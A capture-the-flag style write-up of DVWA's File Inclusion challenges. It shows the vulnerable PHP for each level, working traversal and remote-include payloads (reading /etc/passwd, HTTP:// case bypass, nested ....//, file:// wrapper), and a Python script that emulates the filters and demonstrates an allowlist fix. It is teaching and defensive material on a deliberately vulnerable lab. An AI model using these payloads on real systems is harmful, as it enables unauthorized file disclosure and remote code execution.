DVWA Series - File Inclusion
This is a writeup about the File Inclusion challenges from DVWA (Damn Vulnerable Web App). Let's start.
DISCLAIMER: I DON'T PROMOTE THE USE OF THIS CODE IN A MALICIOUS WAY. HACKING DONE MUST BE DONE LEGALLY WITH CONSENT.
Low
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
This is the code that is given: the value of the page parameter goes straight into include() with no check at all. The GET request looks like yourip/vulnerabilities/fi/?page=. Each ../ in the page parameter moves one directory up; add enough of them and we reach the filesystem root, then append /etc/passwd to read the password file.
include() also accepts URLs (DVWA needs allow_url_include enabled for this level), so we can put any URL in the parameter and the fetched page is rendered inside DVWA. This can be used for phishing, and if the remote resource contains PHP code that code runs on the server, which is what makes remote file inclusion dangerous.
Payload : 1. ../../../../../../../../etc/passwd
2. http://www.google.com/
Medium
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
?>
Two things are happening here. The first str_replace deletes the strings http:// and https:// (it replaces them with an empty string), so a plain URL loses its scheme and is no longer fetched remotely. str_replace is case-sensitive, though, so HTTP:// is left alone and the remote include still works.
The second str_replace deletes ../ and ..\ in the same way. It makes a single pass and does not re-scan its own output, so ....// turns into ../: the ../ found at offset 2 is removed and the characters around it join up to form a fresh ../. Repeating ....// once per directory level rebuilds the Low payload. (The ../ between the ....// blocks in the payload below is simply stripped and is not needed.) Note that the filter also does nothing about an absolute path, so page=/etc/passwd works on this level as well.
Payload: 1. HTTP://google.com
2. ....//../....//../....//../....//../....//../....//../etc/passwd
High
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
Here the page parameter must start with the string file (fnmatch with the pattern file*) or be exactly include.php, so a plain traversal like ../../etc/passwd is rejected and a remote URL no longer matches. The check only looks at the prefix, though, and PHP's include() understands the file:// wrapper for local paths: file:///etc/passwd begins with file, passes the pattern, and opens the very same /etc/passwd. The extra slashes in the payload below are collapsed and are redundant; file:///etc/passwd is enough.
Payload: file:///////etc/passwd
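As an added example (not DVWA's own code), here are the Medium and High filters re-implemented in Python so their behaviour can be checked offline against the payloads from this writeup, followed by the allowlist lookup that should have been used instead. The script directory path and the allowed page names are assumptions; the payloads are constructed from the text above.

```python
# Added example, not DVWA code: emulate the Medium and High "input validation"
# and show why the writeup's payloads survive, then the allowlist fix.
import fnmatch
import os
from typing import Optional

# Assumed location of the vulnerable script; only used to resolve relative values.
BASE_DIR = "/var/www/html/vulnerabilities/fi"


def medium_filter(page: str) -> str:
    """DVWA Medium: str_replace() of the scheme and traversal strings.

    PHP's str_replace() with an array of needles makes one left-to-right pass per
    needle and never re-scans what it produced; str.replace() behaves the same,
    which is exactly what ....// and hthttp://tp:// rely on.
    """
    for needle in ("http://", "https://"):   # case-sensitive: HTTP:// is untouched
        page = page.replace(needle, "")
    for needle in ("../", "..\\"):           # ....// -> ../ after the single pass
        page = page.replace(needle, "")
    return page


def high_filter(page: str) -> bool:
    """DVWA High: fnmatch("file*", $file) || $file == "include.php".

    fnmatchcase mirrors PHP's fnmatch(), which is case-sensitive on Linux.
    Only the prefix is checked, so the file:// wrapper gets through.
    """
    return fnmatch.fnmatchcase(page, "file*") or page == "include.php"


def include_target(page: str, base_dir: str = BASE_DIR) -> str:
    """Approximate the local path include($file) opens for an already-filtered value.

    file:// URLs are local paths, relative values are resolved against the script
    directory (a simplification of PHP's include_path lookup), and redundant
    slashes and ../ beyond the root collapse as they do in the kernel.
    """
    if page.startswith("file://"):
        page = "/" + page[len("file://"):].lstrip("/")
    if not page.startswith("/"):
        page = os.path.join(base_dir, page)
    return os.path.normpath(page)


# The fix: an allowlist. The user value only ever selects a key; it is never
# used as a path or URL. Names are assumed for the example.
ALLOWED_PAGES = frozenset({"include.php", "file1.php", "file2.php", "file3.php"})


def safe_target(page: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the path to include, or None (the 'ERROR: File not found!' case)."""
    if page not in ALLOWED_PAGES:
        return None
    return os.path.join(base_dir, page)


if __name__ == "__main__":
    medium_payloads = [
        "http://www.google.com/",
        "HTTP://google.com",
        "hthttp://tp://google.com",
        "../../../../../../etc/passwd",
        "....//../....//../....//../....//../....//../....//../etc/passwd",
    ]
    for p in medium_payloads:
        f = medium_filter(p)
        print(f"medium  {p!r:70} -> {f!r}  (opens {include_target(f)})")
    for p in ["../../etc/passwd", "file:///////etc/passwd", "include.php"]:
        print(f"high    {p!r:40} passes={high_filter(p)}  opens={include_target(p)}")
    for p in ["file:///etc/passwd", "file1.php"]:
        print(f"fixed   {p!r:40} -> {safe_target(p)}")
```

Running the script shows that the Low traversal is stripped to etc/passwd on Medium while the ....// form comes out as a clean ../ chain, that HTTP:// and the nested hthttp://tp:// survive the scheme filter, that file:///////etc/passwd passes the High check and still resolves to /etc/passwd, and that the allowlist rejects everything except the known page names.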